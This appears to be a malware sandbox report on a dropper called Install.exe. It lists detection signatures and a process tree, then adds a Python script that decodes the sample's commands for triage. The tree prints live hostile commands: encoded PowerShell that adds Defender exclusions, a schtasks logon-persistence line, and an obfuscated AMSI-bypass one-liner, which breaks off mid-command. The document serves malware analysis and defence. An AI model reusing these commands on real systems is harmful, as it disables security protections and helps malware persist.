Windows
Analysis Report
Install.exe
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Uses nslookup.exe to query domains
Encrypted powershell cmdline option found
Allocates memory in foreign processes
Creates files in the system32 config directory
Hooks processes query functions (used to hide processes)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Creates a thread in another existing process (thread injection)
Hooks files or directories query functions (used to hide files and directories)
Uses schtasks.exe or at.exe to add and modify task schedules
Found suspicious powershell code related to unpacking or dynamic code loading
Writes to foreign memory regions
.NET source code references suspicious native API functions
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Creates job files (autostart)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Classification
- System is w10x64
- Install.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\Install.exe" MD5: 280BFD5EA1F41586EA0EF60EE44BC8DB)
- ChiefKeefofficialnaxyi_crypted(6).exe (PID: 6820 cmdline: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe MD5: D55DC38B4EE6BED2168E74194533C572)
- conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- AppLaunch.exe (PID: 6900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
- 34432.exe (PID: 6836 cmdline: C:\Users\user\AppData\Roaming\34432.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
- cmd.exe (PID: 7012 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 7048 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 6856 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
- nslookup.exe (PID: 7056 cmdline: C:\Windows\System32\nslookup.exe MD5: AF1787F1DBE0053D74FC687E7233F8CE)
- cmd.exe (PID: 5412 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 1584 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
- cmd.exe (PID: 6552 cmdline: cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- chrome.exe (PID: 5460 cmdline: C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
- cmd.exe (PID: 6892 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5728 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32
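The process tree above carries three artefacts worth decoding before anything is detonated again: the two -EncodedCommand arguments (PIDs 7048/5728 and 6856), the schtasks /create line (PID 1584), and the eight bytes the PID 6372 one-liner copies over AmsiScanBuffer after making it writable with VirtualProtect. The Python below is an added worked example, not part of the sandbox report or of the sample, and triages those strings offline: it decodes the base64-over-UTF-16LE payloads that -EncodedCommand requires, flags the Add-MpPreference exclusions they turn out to contain, pulls the persistence fields out of the schtasks line, and decodes the AmsiScanBuffer patch. The sample strings are copied from the tree; the helper names, the regexes and the list of user-writable directories are this example's own choices. Two facts about Windows it relies on are not taken from the report: 0x80070057 is E_INVALIDARG, and AmsiScanBuffer is a six-argument stdcall export, so ret 0x18 balances the 32-bit stack.

```python
import base64
import re
import struct

# Strings copied from the process tree above: the -EncodedCommand arguments
# of PIDs 7048/5728 and 6856, the schtasks line of PID 1584 and the 8-byte
# patch the PID 6372 one-liner writes over AmsiScanBuffer.
_COMMON = ("QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0A"
           "RQB4AGMAbAB1AHMAaQBvAG4A")          # "Add-MpPreference -Exclusion"
ENCODED_PATH = (_COMMON + "UABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIA"
                "bwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQAp"
                "ACAALQBGAG8AcgBjAGUA")
ENCODED_EXT = (_COMMON + "RQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwA"
               "JwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=")
SCHTASKS_CMD = (r'schtasks /create /f /sc onlogon /rl highest /tn "chrome" '
                r'/tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"')
AMSI_PATCH = bytes([0xB8, 0x57, 0, 7, 0x80, 0xC2, 0x18, 0])


def decode_encoded_command(b64: str) -> str:
    """Decode a 'powershell -EncodedCommand' argument: base64 over UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


# Add/Set-MpPreference followed by an exclusion or Disable* switch is Defender
# tampering; the switch name is returned so a finding can name it.
_MP_TAMPER = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-(Exclusion(?:Path|Extension|Process)"
    r"|Disable\w+)", re.IGNORECASE)


def find_defender_tampering(command: str):
    m = _MP_TAMPER.search(command)
    return m.group(1) if m else None


# Directories a standard user can write to (example's own list, not exhaustive).
_USER_WRITABLE = re.compile(
    r"\\AppData\\(?:Roaming|Local)\\|\\Users\\Public\\|\\Temp\\", re.IGNORECASE)


def analyse_schtasks(command: str) -> dict:
    """Pull the fields that matter out of a 'schtasks /create' command line."""
    def opt(name):
        m = re.search(r"/" + name + r"\s+(\"[^\"]*\"|\S+)", command, re.IGNORECASE)
        return m.group(1).strip('"') if m else None
    task_run = opt("tr")
    return {
        "name": opt("tn"),
        "trigger": opt("sc"),
        "run_level": opt("rl"),
        "task_run": task_run,
        # persistence that launches from a user-writable directory
        "user_writable_path": bool(task_run and _USER_WRITABLE.search(task_run)),
    }


def describe_amsi_stub(stub: bytes) -> dict:
    """Decode the 2-instruction x86 stub the sample writes over AmsiScanBuffer.

    Only 'mov eax, imm32' (B8 imm32) and 'ret imm16' (C2 imm16) are
    understood, which is all this sample writes.
    """
    if len(stub) != 8 or stub[0] != 0xB8 or stub[5] != 0xC2:
        raise ValueError("not a mov eax,imm32 / ret imm16 stub")
    hresult = struct.unpack_from("<I", stub, 1)[0]
    cleanup = struct.unpack_from("<H", stub, 6)[0]
    return {
        "hresult": hresult,
        "is_e_invalidarg": hresult == 0x80070057,   # E_INVALIDARG
        "stack_cleanup": cleanup,
        # 32-bit stdcall pops 4 bytes per argument; AmsiScanBuffer takes six
        "matches_amsiscanbuffer": cleanup == 6 * 4,
    }


def triage() -> dict:
    """Run every check over the strings taken from the report."""
    decoded = [decode_encoded_command(s) for s in (ENCODED_PATH, ENCODED_EXT)]
    return {
        "decoded": decoded,
        "defender_tampering": [find_defender_tampering(c) for c in decoded],
        "schtasks": analyse_schtasks(SCHTASKS_CMD),
        "amsi_stub": describe_amsi_stub(AMSI_PATCH),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Decoded, the two PowerShell runs are Add-MpPreference -ExclusionPath for $env:UserProfile and $env:SystemDrive and Add-MpPreference -ExclusionExtension for exe and dll, which is why Defender never sees the dropped files. The scheduled task runs at every logon with the highest run level from AppData\Roaming, and the chrome.exe it launches (PID 5460) has the same MD5 as 34432.exe, so the "browser" is the dropped payload under a new name. The AMSI stub makes every scan return E_INVALIDARG while still unwinding the caller's stack correctly, which is what lets the subsequent [Reflection.Assembly]::Load go unscanned.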